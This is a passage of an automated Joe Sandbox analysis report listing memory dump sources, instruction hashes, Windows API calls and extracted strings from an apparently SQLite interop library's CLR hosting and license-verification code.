                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: C111A3725112029FFB009FD9D886859FB68FB4622D380813BE51C9B600DB3AE956CFD1
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • SIaa0f8e0c251cfd1d.SQLITE.INTEROP(00000000,00000000), ref: 6BC06899
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000007.00000002.2206517691.000000006BBD1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6BBD0000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2204171827.000000006BBD0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2212459047.000000006BCEF000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2212827478.000000006BD14000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2212901838.000000006BD18000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2212959453.000000006BD19000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2213023190.000000006BD1C000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_6bbd0000_v2.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: Iaa0f8e0c251cfd1d.
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 372259789-0
                                                                                                                                                                                                                                      • Opcode ID: bbf3d398459fb2b6ea8ef3f5eba10cada9158bcc6fffdce565f328763d8d338f
                                                                                                                                                                                                                                      • Instruction ID: 78e7849d9dca69b2951cd107881e212c24f4cf98cfa1a33830ca377ab87daabb
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: bbf3d398459fb2b6ea8ef3f5eba10cada9158bcc6fffdce565f328763d8d338f
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: E81182B59156018BFF00DF28E84741AB3A4BB463193C01135E82ADB201EB3BE65FCB75
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • GetCurrentProcessId.KERNEL32 ref: 6BCE1A0C
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000007.00000002.2206517691.000000006BBD1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6BBD0000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2204171827.000000006BBD0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2212459047.000000006BCEF000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2212827478.000000006BD14000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2212901838.000000006BD18000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2212959453.000000006BD19000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2213023190.000000006BD1C000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_6bbd0000_v2.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: CurrentProcess
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 2050909247-0
                                                                                                                                                                                                                                      • Opcode ID: 8e3fe74ffdd0f9ae50a522fe9ba4256f9ac87e226e53c18d4aebc5c0acc2684a
                                                                                                                                                                                                                                      • Instruction ID: fcd59422812e21d857a2a6fe98fdf891bdd8dd1b9cedf97c8a07a9fe2caee86f
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 8e3fe74ffdd0f9ae50a522fe9ba4256f9ac87e226e53c18d4aebc5c0acc2684a
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 3301AD77750129DBC7109EACE481AAB73A9EBD4361F108026FA5497200E3789962DBF0
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • KiUserExceptionDispatcher.NTDLL ref: 02CC648D
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000007.00000002.2163193742.0000000002CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02CC0000, based on PE: false
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_2cc0000_v2.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: DispatcherExceptionUser
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 6842923-0
                                                                                                                                                                                                                                      • Opcode ID: 4361fe726f64030a13ebe4c3a4fd6eab14fc04cf3cc731ceac059ca03ef37cbc
                                                                                                                                                                                                                                      • Instruction ID: 26f51a9a4d98a79bbacd9036cd7c20bcf62214ba7fa5b9eba6c6d06046e71d8a
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 4361fe726f64030a13ebe4c3a4fd6eab14fc04cf3cc731ceac059ca03ef37cbc
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: FE01ED78725A648FCF16AB74A11E1AD7FB9AF88711B01005DF957D7344DF340A42CB8A
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • KiUserExceptionDispatcher.NTDLL ref: 02CC648D
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000007.00000002.2163193742.0000000002CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02CC0000, based on PE: false
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_2cc0000_v2.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: DispatcherExceptionUser
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 6842923-0
                                                                                                                                                                                                                                      • Opcode ID: 0617fd2ffbf83c3fcd0951892249c23fec04d1ef4d04e302f411b6a40730d320
                                                                                                                                                                                                                                      • Instruction ID: cb8a5359f8611e1fa6b168312c019f7067e04531f357e96d37a6684355a3b1b7
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 0617fd2ffbf83c3fcd0951892249c23fec04d1ef4d04e302f411b6a40730d320
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: D0019A78B20E249F8F55AB64A11E16D7FB9BB88711B11011DF917D7340DF340A428BDA
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • SI9dbf9d88aa001ea6.SQLITE.INTEROP(00000004,6BCFEFE4,6BCC5697), ref: 6BC5B270
                                                                                                                                                                                                                                        • Part of subcall function 6BC5D090: SI769271af19a2299d.SQLITE.INTEROP(00000015,%s at line %d of [%.10s],misuse,0002A4DE,fcb4fd26a8c624f2e433ba6a6b153343225cc9d85dd297502ca5c696b603431f,00000000,00000000,?,?,?,6BC6103B,00000012,6BCFF004,?,6BCC5752), ref: 6BC5D0BA
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000007.00000002.2206517691.000000006BBD1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6BBD0000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2204171827.000000006BBD0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2212459047.000000006BCEF000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2212827478.000000006BD14000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2212901838.000000006BD18000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2212959453.000000006BD19000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2213023190.000000006BD1C000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_6bbd0000_v2.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: I769271af19a2299d.I9dbf9d88aa001ea6.
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 3129734836-0
                                                                                                                                                                                                                                      • Opcode ID: 83faae2203383f0e1459d3b94846cbe66caf064c6ffad7a2786aeadb0cfa1d4f
                                                                                                                                                                                                                                      • Instruction ID: 12dcdffcecd57575e26c1696f9f285b613e7a77734cddf8457dfdeb4dc8cd5e1
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 83faae2203383f0e1459d3b94846cbe66caf064c6ffad7a2786aeadb0cfa1d4f
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 7401C9B1819706DAFF448FA4D847309BAA0A70A31AF80012EE1199E251E77CC16B8B1D
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000007.00000002.2206517691.000000006BBD1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6BBD0000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2204171827.000000006BBD0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2212459047.000000006BCEF000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2212827478.000000006BD14000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2212901838.000000006BD18000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2212959453.000000006BD19000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2213023190.000000006BD1C000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_6bbd0000_v2.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: _memset
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 2102423945-0
                                                                                                                                                                                                                                      • Opcode ID: fd1f06ef651f2a7ab7bf677ef6c34145830bda350c842993e89b3fd2993b7a17
                                                                                                                                                                                                                                      • Instruction ID: f64cb5256b9606c2ab04797f35f64f3a9bc182005ffb79d83695157b38d2ec4b
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: fd1f06ef651f2a7ab7bf677ef6c34145830bda350c842993e89b3fd2993b7a17
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 3BF0E532B3A11037D610556AAC05E6B776DCFD2958F048025BD08E7300FA78DB01D5F1
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000007.00000002.2206517691.000000006BBD1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6BBD0000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2204171827.000000006BBD0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2212459047.000000006BCEF000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2212827478.000000006BD14000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2212901838.000000006BD18000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2212959453.000000006BD19000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2213023190.000000006BD1C000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_6bbd0000_v2.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: _memset
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 2102423945-0
                                                                                                                                                                                                                                      • Opcode ID: f16064faa86de4dc8ba8ae4a60403ccdbe4809c93ad6ee5ef1977a1cb9bdd78b
                                                                                                                                                                                                                                      • Instruction ID: f8b84e03927b6bb668d42d2b72462c02d81d17ab92cccf21ad83d954c106e0eb
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: f16064faa86de4dc8ba8ae4a60403ccdbe4809c93ad6ee5ef1977a1cb9bdd78b
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 06E0DF353003846BC6309A6BDC09C4B3B6DEBC6B25F4100A5F70C8B241D53AD816C2B1
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000007.00000002.2162251699.00000000012ED000.00000040.00000800.00020000.00000000.sdmp, Offset: 012ED000, based on PE: false
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_12ed000_v2.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                      • Opcode ID: 73ba88630f4f806594b6535b8db494e60a769272e923b2d1ea25614877744fc4
                                                                                                                                                                                                                                      • Instruction ID: 865e6c8b57acb478204fb6d5d5d1ab9b93aafd3cc366ada72c23aa31e359bab7
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 73ba88630f4f806594b6535b8db494e60a769272e923b2d1ea25614877744fc4
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 2D2134B5554200EFDB09DF18D9C8B26BFE5FB84314F64C9ADD9090F246C376D806CA62
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000007.00000002.2162251699.00000000012ED000.00000040.00000800.00020000.00000000.sdmp, Offset: 012ED000, based on PE: false
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_12ed000_v2.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                      • Opcode ID: 844f55b9ea315d34d5ac99657749e9e77fc5e2a8e0258ab97745b7cff8d7c2fe
                                                                                                                                                                                                                                      • Instruction ID: 899cf08e3373c9bb4f9076c7b18084cd68eb15000fd599bb4bd5cf93eec2ca8f
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 844f55b9ea315d34d5ac99657749e9e77fc5e2a8e0258ab97745b7cff8d7c2fe
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 59215BB1524241EFDB01DF18E9C8B26BFE5FB88314F65C56DE9090B246E37AD406C672
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000007.00000002.2162251699.00000000012ED000.00000040.00000800.00020000.00000000.sdmp, Offset: 012ED000, based on PE: false
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_12ed000_v2.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                      • Opcode ID: 5ecdbd2196c02b2d36a90ebf2b22d30fffd8b7da1097997a33617a95b9f44a3d
                                                                                                                                                                                                                                      • Instruction ID: 0939521da92767f216085e7dee3e78f6f037a0625d3cb0a4acac7d5350ea5b14
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 5ecdbd2196c02b2d36a90ebf2b22d30fffd8b7da1097997a33617a95b9f44a3d
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 6E11DD79544280CFDB06CF14D5C8B15BFB2FB84314F24C6A9D9494B656C33AD40ACB62
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • _memset.LIBCMT ref: 6BBF89B5
                                                                                                                                                                                                                                      • OutputDebugStringA.KERNEL32(invalid ICLRRuntimeHost.,?,?,6BC6F705), ref: 6BBF89D8
                                                                                                                                                                                                                                      • GetProcessHeap.KERNEL32(?,?,6BC6F705), ref: 6BBF89E8
                                                                                                                                                                                                                                      • OutputDebugStringA.KERNEL32(invalid process heap.,?,?,6BC6F705), ref: 6BBF89FB
                                                                                                                                                                                                                                      • GetLastError.KERNEL32(?,?,6BC6F705), ref: 6BBF8A01
                                                                                                                                                                                                                                      • OutputDebugStringA.KERNEL32(could not free strong name buffer.), ref: 6BBF914C
                                                                                                                                                                                                                                      • HeapFree.KERNEL32(?,00000000,00000000,?,?,?,?,?,6BC6F705), ref: 6BBF9199
                                                                                                                                                                                                                                      • _memset.LIBCMT ref: 6BBF91B1
                                                                                                                                                                                                                                      • __snprintf.LIBCMT ref: 6BBF91CE
                                                                                                                                                                                                                                      • OutputDebugStringA.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,6BC6F705), ref: 6BBF91DE
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      • bad callback from setup method., xrefs: 6BBF90A0
                                                                                                                                                                                                                                      • v4.0.30319, xrefs: 6BBF8D66, 6BBF8D7B
                                                                                                                                                                                                                                      • invalid process heap., xrefs: 6BBF89F6
                                                                                                                                                                                                                                      • <unknown>, xrefs: 6BBF91B7
                                                                                                                                                                                                                                      • missing CLR function., xrefs: 6BBF8D0A
                                                                                                                                                                                                                                      • CLRCreateInstance, xrefs: 6BBF8CFA
                                                                                                                                                                                                                                      • modern strong name token failure., xrefs: 6BBF8E6A
                                                                                                                                                                                                                                      • bad assembly path env size., xrefs: 6BBF910E
                                                                                                                                                                                                                                      • invalid ICLRRuntimeHost., xrefs: 6BBF89D3
                                                                                                                                                                                                                                      • assembly path env success., xrefs: 6BBF8A89
                                                                                                                                                                                                                                      • could not execute verify method., xrefs: 6BBF90DA
                                                                                                                                                                                                                                      • System.Data.SQLite.SQLiteExtra, xrefs: 6BBF8CA8
                                                                                                                                                                                                                                      • could not get ICLRRuntimeInfo., xrefs: 6BBF8D88
                                                                                                                                                                                                                                      • CLR creation not implemented., xrefs: 6BBF8D4D
                                                                                                                                                                                                                                      • LicenseAssemblyPath, xrefs: 6BBF8A73
                                                                                                                                                                                                                                      • assembly path found via module., xrefs: 6BBF8BE9
                                                                                                                                                                                                                                      • MSCorEE, xrefs: 6BBF8CE3
                                                                                                                                                                                                                                      • could not trim module file name., xrefs: 6BBF8B06
                                                                                                                                                                                                                                      • modern strong name check failure., xrefs: 6BBF8E21
                                                                                                                                                                                                                                      • x86, xrefs: 6BBF8B1D
                                                                                                                                                                                                                                      • strong name size and data matched., xrefs: 6BBF8F2D
                                                                                                                                                                                                                                      • assembly path not found via process., xrefs: 6BBF8BBD
                                                                                                                                                                                                                                      • SdkCallback_%lX_%lX_%lX, xrefs: 6BBF8FDA
                                                                                                                                                                                                                                      • detected .NET Core in process., xrefs: 6BBF8C87
                                                                                                                                                                                                                                      • 0, xrefs: 6BBF8C26
                                                                                                                                                                                                                                      • no current application domain?, xrefs: 6BBF8F99
                                                                                                                                                                                                                                      • ICLRRuntimeInfo not loadable., xrefs: 6BBF8DC6
                                                                                                                                                                                                                                      • good callback from setup method., xrefs: 6BBF9075
                                                                                                                                                                                                                                      • ARM, xrefs: 6BBF8B3F
                                                                                                                                                                                                                                      • Verify, xrefs: 6BBF8CA3
                                                                                                                                                                                                                                      • assembly path not trusted., xrefs: 6BBF8C5A
                                                                                                                                                                                                                                      • could not free strong name buffer., xrefs: 6BBF9147
                                                                                                                                                                                                                                      • could not get module file name., xrefs: 6BBF8B9D
                                                                                                                                                                                                                                      • verify method returned success., xrefs: 6BBF8CD7
                                                                                                                                                                                                                                      • could not get ICLRStrongName., xrefs: 6BBF8DF7
                                                                                                                                                                                                                                      • assembly path not found via module., xrefs: 6BBF8B85
                                                                                                                                                                                                                                      • verify method returned failure., xrefs: 6BBF90B2
                                                                                                                                                                                                                                      • assembly path is trusted., xrefs: 6BBF8C6F
                                                                                                                                                                                                                                      • strong name token size mismatch., xrefs: 6BBF8EBC
                                                                                                                                                                                                                                      • modern strong name check unverified., xrefs: 6BBF8E38
                                                                                                                                                                                                                                      • could not unset setup method callback., xrefs: 6BBF903A
                                                                                                                                                                                                                                      • missing CLR module in process., xrefs: 6BBF8CEE
                                                                                                                                                                                                                                      • strong name check was not verified., xrefs: 6BBF8E8E
                                                                                                                                                                                                                                      • assembly path env failure., xrefs: 6BBF90F1
                                                                                                                                                                                                                                      • LicenseOtherAppDomain, xrefs: 6BBF8F67
                                                                                                                                                                                                                                      • modern strong name check verified., xrefs: 6BBF8E80
                                                                                                                                                                                                                                      • could not allocate path., xrefs: 6BBF8A4C
                                                                                                                                                                                                                                      • v2.0.50727, xrefs: 6BBF8D5F
                                                                                                                                                                                                                                      • Win32, xrefs: 6BBF8B35
                                                                                                                                                                                                                                      • eeeSdk1: %s HRESULT 0x%016X, xrefs: 6BBF91BC
                                                                                                                                                                                                                                      • could not get setup method callback., xrefs: 6BBF901C
                                                                                                                                                                                                                                      • x64, xrefs: 6BBF8B2B
                                                                                                                                                                                                                                      • System.Data.SQLite.SEE.License, xrefs: 6BBF8A23, 6BBF8B61, 6BBF8B66
                                                                                                                                                                                                                                      • ARM64, xrefs: 6BBF8B49
                                                                                                                                                                                                                                      • assembly path found via process., xrefs: 6BBF8BE0
                                                                                                                                                                                                                                      • .dll, xrefs: 6BBF8B6A
                                                                                                                                                                                                                                      • ICLRRuntimeInfo loadable failure., xrefs: 6BBF8DAF
                                                                                                                                                                                                                                      • verify method unreachable., xrefs: 6BBF90CF
                                                                                                                                                                                                                                      • CoreCLR, xrefs: 6BBF8C7C
                                                                                                                                                                                                                                      • strong name token data mismatch., xrefs: 6BBF8F18
                                                                                                                                                                                                                                      • strong name token data missing., xrefs: 6BBF90E3
                                                                                                                                                                                                                                      • could not create ICLRMetaHost., xrefs: 6BBF8D36
                                                                                                                                                                                                                                      • assembly path env not found., xrefs: 6BBF8AB5
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000007.00000002.2206517691.000000006BBD1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6BBD0000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2204171827.000000006BBD0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2212459047.000000006BCEF000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2212827478.000000006BD14000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2212901838.000000006BD18000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2212959453.000000006BD19000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2213023190.000000006BD1C000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_6bbd0000_v2.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: DebugOutputString$Heap_memset$ErrorFreeLastProcess__snprintf
                                                                                                                                                                                                                                      • String ID: .dll$0$<unknown>$ARM$ARM64$CLR creation not implemented.$CLRCreateInstance$CoreCLR$ICLRRuntimeInfo loadable failure.$ICLRRuntimeInfo not loadable.$LicenseAssemblyPath$LicenseOtherAppDomain$MSCorEE$SdkCallback_%lX_%lX_%lX$System.Data.SQLite.SEE.License$System.Data.SQLite.SQLiteExtra$Verify$Win32$assembly path env failure.$assembly path env not found.$assembly path env success.$assembly path found via module.$assembly path found via process.$assembly path is trusted.$assembly path not found via module.$assembly path not found via process.$assembly path not trusted.$bad assembly path env size.$bad callback from setup method.$could not allocate path.$could not create ICLRMetaHost.$could not execute verify method.$could not free strong name buffer.$could not get ICLRRuntimeInfo.$could not get ICLRStrongName.$could not get module file name.$could not get setup method callback.$could not trim module file name.$could not unset setup method callback.$detected .NET Core in process.$eeeSdk1: %s HRESULT 0x%016X$good callback from setup method.$invalid ICLRRuntimeHost.$invalid process heap.$missing CLR function.$missing CLR module in process.$modern strong name check failure.$modern strong name check unverified.$modern strong name check verified.$modern strong name token failure.$no current application domain?$strong name check was not verified.$strong name size and data matched.$strong name token data mismatch.$strong name token data missing.$strong name token size mismatch.$v2.0.50727$v4.0.30319$verify method returned failure.$verify method returned success.$verify method unreachable.$x64$x86
                                                                                                                                                                                                                                      • API String ID: 2919618621-37461390
                                                                                                                                                                                                                                      • Opcode ID: 2dbcb3c85acf92f664213b12db51612d76e44d0907eb41eecb101663927fbf0c
                                                                                                                                                                                                                                      • Instruction ID: 26228ae2323ae39014bcb11ffa3bfe1b3f0453a471288dfad221b7e6e173d33d
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 2dbcb3c85acf92f664213b12db51612d76e44d0907eb41eecb101663927fbf0c
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: D522C370918385EFE710DF65CC88B5ABBF9EB8A714F40091CF1859B241DB7CD94A8B62
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • GetModuleHandleW.KERNEL32(CoreCLR,?,?), ref: 6BBF9244
                                                                                                                                                                                                                                      • OutputDebugStringA.KERNEL32(detected .NET Core in process.,?,?), ref: 6BBF9257
                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,GetCLRRuntimeHost), ref: 6BBF925F
                                                                                                                                                                                                                                      • OutputDebugStringA.KERNEL32(ICLRRuntimeHost2 start failure.,?,?), ref: 6BBF92A0
                                                                                                                                                                                                                                      • OutputDebugStringA.KERNEL32(could not get ICLRRuntimeHost2.,?,?), ref: 6BBF92AC
                                                                                                                                                                                                                                      • OutputDebugStringA.KERNEL32(missing CoreCLR function.,?,?), ref: 6BBF92B8
                                                                                                                                                                                                                                      • GetModuleHandleW.KERNEL32(MSCorEE,?,?), ref: 6BBF92C9
                                                                                                                                                                                                                                      • OutputDebugStringA.KERNEL32(missing CLR module in process.,?,?), ref: 6BBF92DA
                                                                                                                                                                                                                                      • GetLastError.KERNEL32(?,?), ref: 6BBF92DC
                                                                                                                                                                                                                                      • OutputDebugStringA.KERNEL32(ICLRRuntimeHost query success.,?,?), ref: 6BBF943B
                                                                                                                                                                                                                                      • _memset.LIBCMT ref: 6BBF94A6
                                                                                                                                                                                                                                      • __snprintf.LIBCMT ref: 6BBF94C2
                                                                                                                                                                                                                                      • OutputDebugStringA.KERNEL32(?,?,?,?,?,?,?,?), ref: 6BBF94D1
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      • ICLRRuntimeHost2 start failure., xrefs: 6BBF929B
                                                                                                                                                                                                                                      • v4.0.30319, xrefs: 6BBF939E
                                                                                                                                                                                                                                      • ICLRRuntimeHost2 start success., xrefs: 6BBF9291
                                                                                                                                                                                                                                      • <unknown>, xrefs: 6BBF94AC
                                                                                                                                                                                                                                      • missing CLR function., xrefs: 6BBF9314
                                                                                                                                                                                                                                      • CLRCreateInstance, xrefs: 6BBF92FE
                                                                                                                                                                                                                                      • could not get ICLRRuntimeHost., xrefs: 6BBF942D
                                                                                                                                                                                                                                      • ICLRRuntimeInfo loadable failure., xrefs: 6BBF93E2
                                                                                                                                                                                                                                      • CorBindToRuntimeEx success., xrefs: 6BBF9374
                                                                                                                                                                                                                                      • ICLRRuntimeHost query success., xrefs: 6BBF9436
                                                                                                                                                                                                                                      • missing CLR module in process., xrefs: 6BBF92D5
                                                                                                                                                                                                                                      • missing CoreCLR function., xrefs: 6BBF92B3
                                                                                                                                                                                                                                      • could not get ICLRRuntimeInfo., xrefs: 6BBF93B5
                                                                                                                                                                                                                                      • CLR creation not implemented., xrefs: 6BBF934D
                                                                                                                                                                                                                                      • CoreCLR, xrefs: 6BBF9221
                                                                                                                                                                                                                                      • MSCorEE, xrefs: 6BBF92C4
                                                                                                                                                                                                                                      • detected .NET Core in process., xrefs: 6BBF9252
                                                                                                                                                                                                                                      • GetCLRRuntimeHost, xrefs: 6BBF9259
                                                                                                                                                                                                                                      • could not create ICLRMetaHost., xrefs: 6BBF933A
                                                                                                                                                                                                                                      • eeeSdk1: %s HRESULT 0x%016X, xrefs: 6BBF94B1
                                                                                                                                                                                                                                      • ICLRRuntimeInfo not loadable., xrefs: 6BBF93F9
                                                                                                                                                                                                                                      • could not get ICLRRuntimeHost2., xrefs: 6BBF92A7
                                                                                                                                                                                                                                      • CorBindToRuntimeEx failure., xrefs: 6BBF937E
                                                                                                                                                                                                                                      Memory Dump Source
